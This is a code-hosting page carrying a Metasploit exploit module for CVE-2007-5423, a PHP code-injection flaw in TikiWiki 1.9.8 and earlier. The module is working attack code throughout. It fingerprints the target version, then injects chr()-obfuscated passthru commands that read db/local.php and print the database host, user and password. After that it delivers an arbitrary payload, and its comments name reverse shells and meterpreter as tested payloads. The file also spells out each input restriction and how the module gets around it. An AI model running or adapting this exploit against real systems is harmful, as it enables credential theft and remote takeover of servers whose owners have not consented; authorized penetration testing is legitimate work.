PageRenderTime 57ms CodeModel.GetById 30ms RepoModel.GetById 1ms app.codeStats 0ms

/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb

https://bitbucket.org/jrossi/metasploit
Ruby | 236 lines | 217 code | 5 blank | 14 comment | 0 complexity | f4ce811ce0accf45ef1e93a5176f1a6f MD5 | raw file
Possible License(s): GPL-2.0, LGPL-2.1, BSD-3-Clause 
    

  1. ##
    2. 

  2. # $Id$
    3. 

  3. ##
    4. 

  4. 

  5. ##
    6. 

  6. # This file is part of the Metasploit Framework and may be subject to
    7. 

  7. # redistribution and commercial restrictions. Please see the Metasploit
    8. 

  8. # Framework web site for more information on licensing and terms of use.
    9. 

  9. # http://metasploit.com/framework/
    10. 

  10. ##
    11. 

  11. 

  12. require 'msf/core'
    13. 

  13. 

  14. class Metasploit3 < Msf::Exploit::Remote
    15. 

  15. 	Rank = ExcellentRanking
    16. 

  16. 

  17. 	include Msf::Exploit::Remote::HttpClient
    18. 

  18. 

  19. 	def initialize(info = {})
    20. 

  20. 		super(update_info(info,
    21. 

  21. 			'Name'           => 'TikiWiki tiki-graph_formula Remote PHP Code Execution',
    22. 

  22. 			'Description'    => %q{
    23. 

  23. 					TikiWiki (<= 1.9.8) contains a flaw that may allow a remote
    24. 

  24. 				attacker to execute arbitrary PHP code.  The issue is due to
    25. 

  25. 				'tiki-graph_formula.php' script not properly sanitizing user
    26. 

  26. 				input supplied to create_function(), which may allow a remote
    27. 

  27. 				attacker to execute arbitrary PHP code resulting in a loss of
    28. 

  28. 				integrity.
    29. 

  29. 			},
    30. 

  30. 			'Author'         => [ 'Matteo Cantoni <goony[at]nothink.org>', 'jduck' ],
    31. 

  31. 			'License'        => MSF_LICENSE,
    32. 

  32. 			'Version'        => '$Revision$',
    33. 

  33. 			'References'     =>
    34. 

  34. 				[
    35. 

  35. 					['CVE', '2007-5423'],
    36. 

  36. 					['OSVDB', '40478'],
    37. 

  37. 					['BID', '26006'],
    38. 

  38. 				],
    39. 

  39. 			'Privileged'     => false,
    40. 

  40. 			'Payload'        =>
    41. 

  41. 				{
    42. 

  42. 					'DisableNops' => true,
    43. 

  43. 					# 6k.  Really it's the max length of a URI minus the junk
    44. 

  44. 					# we have to put in the request to trigger the
    45. 

  45. 					# vulnerability.  On Apache, 8190 is the max, so this
    46. 

  46. 					# should be a pretty safe value.
    47. 

  47. 					'Space'       => 6144,
    48. 

  48. 					# Yes, 'x' is a badchar.  The vulnerable code replaces it with '$x'.
    49. 

  49. 					'BadChars'    => "`\"' %&x",
    50. 

  50. 				},
    51. 

  51. 			'Platform'       => 'php',
    52. 

  52. 			'Arch'           => ARCH_PHP,
    53. 

  53. 			'Targets'        => [[ 'Automatic', { }]],
    54. 

  54. 			'DisclosureDate' => 'Oct 10 2007',
    55. 

  55. 			'DefaultTarget'  => 0))
    56. 

  56. 

  57. 		register_options(
    58. 

  58. 			[
    59. 

  59. 				OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki"]),
    60. 

  60. 			], self.class)
    61. 

  61. 	end
    62. 

  62. 

  63. 	def check
    64. 

  64. 		res = send_request_raw(
    65. 

  65. 			{
    66. 

  66. 				'uri'     => datastore['URI'] + "/tiki-index.php",
    67. 

  67. 				'method'  => 'GET',
    68. 

  68. 				'headers' =>
    69. 

  69. 					{
    70. 

  70. 						'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
    71. 

  71. 						'Connection' => 'Close',
    72. 

  72. 					}
    73. 

  73. 			}, 5)
    74. 

  74. 

  75. 		http_fingerprint({ :response => res })  # check method
    76. 

  76. 

  77. 		if (res and res.code == 200 and res.body.match(/TikiWiki v?([0-9\.]*)/))
    78. 

  78. 			ver = $1
    79. 

  79. 			#print_status("Detected TikiWiki version #{ver}")
    80. 

  80. 			ver = ver.split('.')
    81. 

  81. 			return Exploit::CheckCode::Safe if (ver[0] != '1')
    82. 

  82. 			return Exploit::CheckCode::Safe if (ver[1] != '9')
    83. 

  83. 			if (ver.length > 2)
    84. 

  84. 				ver2 = ver[2].to_i
    85. 

  85. 				if (ver.length > 3)
    86. 

  86. 					ver3 = ver[3].to_i
    87. 

  87. 				else
    88. 

  88. 					ver3 = 0
    89. 

  89. 				end
    90. 

  90. 				return Exploit::CheckCode::Safe if (ver2 > 8)
    91. 

  91. 				return Exploit::CheckCode::Safe if (ver2 == 8 and ver3 > 0)
    92. 

  92. 			end
    93. 

  93. 			return Exploit::CheckCode::Vulnerable
    94. 

  94. 		end
    95. 

  95. 		Exploit::CheckCode::Safe
    96. 

  96. 	end
    97. 

  97. 

  98. 	def exploit
    99. 

  99. 

  100. 		print_status("Attempting to obtain database credentials...")
    101. 

  101. 		url_db_local = build_uri("passthru(" +
    102. 

  102. 			"chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89)." +  # echo YYY
    103. 

  103. 			"chr(59)." +  # ;
    104. 

  104. 			# cat db/local.php
    105. 

  105. 			"chr(99).chr(97).chr(116).chr(32).chr(100).chr(98).chr(47).chr(108).chr(111).chr(99).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112)." +
    106. 

  106. 			"chr(59)." +  # ;
    107. 

  107. 			"chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89)" +   # echo YYY
    108. 

  108. 			")")
    109. 

  109. 		res = send_request_raw({
    110. 

  110. 			'uri'     => url_db_local,
    111. 

  111. 			'method'  => 'GET',
    112. 

  112. 			'headers' =>
    113. 

  113. 				{
    114. 

  114. 					'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
    115. 

  115. 					'Connection' => 'Close',
    116. 

  116. 				}
    117. 

  117. 			}, 5)
    118. 

  118. 		if (res and res.message == "OK" and res.body)
    119. 

  119. 			print_status("The server returned            : #{res.code} #{res.message}")
    120. 

  120. 			print_status("Server version                 : #{res.headers['Server']}")
    121. 

  121. 

  122. 			db_tiki   = res.body.match(/db_tiki='(.*?)';/m)
    123. 

  123. 			if (db_tiki)
    124. 

  124. 				dbversion = res.body.match(/dbversion_tiki='(.*?)';/m)
    125. 

  125. 				host_tiki = res.body.match(/host_tiki='(.*?)';/m)
    126. 

  126. 				user_tiki = res.body.match(/user_tiki='(.*?)';/m)
    127. 

  127. 				pass_tiki = res.body.match(/pass_tiki='(.*?)';/m)
    128. 

  128. 				dbs_tiki  = res.body.match(/dbs_tiki='(.*?)';/m)
    129. 

  129. 

  130. 				print_status("TikiWiki database informations : \n")
    131. 

  131. 

  132. 				print("db_tiki   : " + db_tiki[1]   + "\n")
    133. 

  133. 				print("dbversion : " + dbversion[1] + "\n")
    134. 

  134. 				print("host_tiki : " + host_tiki[1] + "\n")
    135. 

  135. 				print("user_tiki : " + user_tiki[1] + "\n")
    136. 

  136. 				print("pass_tiki : " + pass_tiki[1] + "\n")
    137. 

  137. 				print("dbs_tiki  : " + dbs_tiki[1]  + "\n\n")
    138. 

  138. 			end
    139. 

  139. 		else
    140. 

  140. 			print_status("No response from the server")
    141. 

  141. 		end
    142. 

  142. 

  143. 

  144. 		print_status("Attempting to execute our payload...")
    145. 

  145. 		command = Rex::Text.uri_encode(payload.encoded)
    146. 

  146. 		url_cmd = build_uri(payload.encoded)
    147. 

  147. 		res = send_request_raw({
    148. 

  148. 			'uri'     => url_cmd,
    149. 

  149. 			'method'  => 'GET',
    150. 

  150. 			'headers' =>
    151. 

  151. 				{
    152. 

  152. 					'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
    153. 

  153. 					'Connection' => 'Close',
    154. 

  154. 				}
    155. 

  155. 			}, 5)
    156. 

  156. 	end
    157. 

  157. 

  158. 	#
    159. 

  159. 	# This function will build a fairly randomish query string to be used
    160. 

  160. 	# when exploiting this vulnerability :)
    161. 

  161. 	#
    162. 

  162. 	def build_uri(f_val)
    163. 

  163. 		uri = ''
    164. 

  164. 		uri << datastore['URI']
    165. 

  165. 		uri << "/tiki-graph_formula.php?"
    166. 

  166. 

  167. 		# Requirements:
    168. 

  168. 		query = ''
    169. 

  169. 

  170. 		# 1. w,h,s,min,max must all be numeric
    171. 

  171. 		vars = %w{ w h s min max }
    172. 

  172. 		min = nil
    173. 

  173. 		vars.each { |el|
    174. 

  174. 			query << "&" if query.length > 0
    175. 

  175. 			num = 1+rand(999)
    176. 

  176. 			# 2. min must be less than max
    177. 

  177. 			case el
    178. 

  178. 			when 's'
    179. 

  179. 				num = 1+rand(500)
    180. 

  180. 			when 'min'
    181. 

  181. 				if (min)
    182. 

  182. 					num = min
    183. 

  183. 				else
    184. 

  184. 					min = num
    185. 

  185. 				end
    186. 

  186. 			when 'max'
    187. 

  187. 				min ||= num
    188. 

  188. 				num = min + 1 + rand(99)
    189. 

  189. 			end
    190. 

  190. 			query << "#{el}=#{num}"
    191. 

  191. 		}
    192. 

  192. 

  193. 		# 3. cannot use `, ', ", or space
    194. 

  194. 		if (f_val.index('\'') or f_val.index('"') or f_val.index('`') or f_val.index(' '))
    195. 

  195. 			raise RuntimeError, "The value for the 'f' variable contains an invalid character!"
    196. 

  196. 		end
    197. 

  197. 

  198. 		# 4. the function must be one of:
    199. 

  199. 		valid = %w{
    200. 

  200. 			abs acos acosh asin asinh atan2 atan atanh ceil cos cosh deg2rad
    201. 

  201. 			exp expm1 floor fmod hypot log10 log1p log max min pi pow rad2deg round sin
    202. 

  202. 			sinh sqrt tan tanh
    203. 

  203. 		}
    204. 

  204. 		func = valid[rand(valid.length)]
    205. 

  205. 

  206. 		# 5. f must be an array
    207. 

  207. 		query << "&" if query.length > 0
    208. 

  208. 

  209. 		# Strip off the semi-colon that the encoder insists on including.
    210. 

  210. 		if f_val[-1,1] == ";"
    211. 

  211. 			f_val = f_val[0,f_val.length-1]
    212. 

  212. 		end
    213. 

  213. 		query << "f[]=x.#{func}.#{f_val}"
    214. 

  214. 

  215. 		# This doesn't seem to be necessary on PHP 5.2.4, tikiwiki 1.9.5
    216. 

  216. 		# Tested with php/reverse_php, php/meterpreter_reverse_tcp, and
    217. 

  217. 		# php/meterpreter/reverse_tcp
    218. 

  218. 		#  -egypt
    219. 

  219. 		# If we dont kill php here it spins eating 100% cpu :-/
    220. 

  220. 		#query << '.die()'
    221. 

  221. 

  222. 		# 6. two options for 't' - png and pdf
    223. 

  223. 		#    - png requires php's gd extension
    224. 

  224. 		#    - pdf, if you set 'p', requires php pdf extension
    225. 

  225. 		#  -- we always use 'pdf' with a null 'p'
    226. 

  226. 		query << "&" if query.length > 0
    227. 

  227. 		query << 't=pdf'
    228. 

  228. 

  229. 		# 7. title must be set
    230. 

  230. 		query << '&title='
    231. 

  231. 

  232. 		uri << query
    233. 

  233. 		uri
    234. 

  234. 	end
    235. 

  235. 

  236. end
    237. 

  237.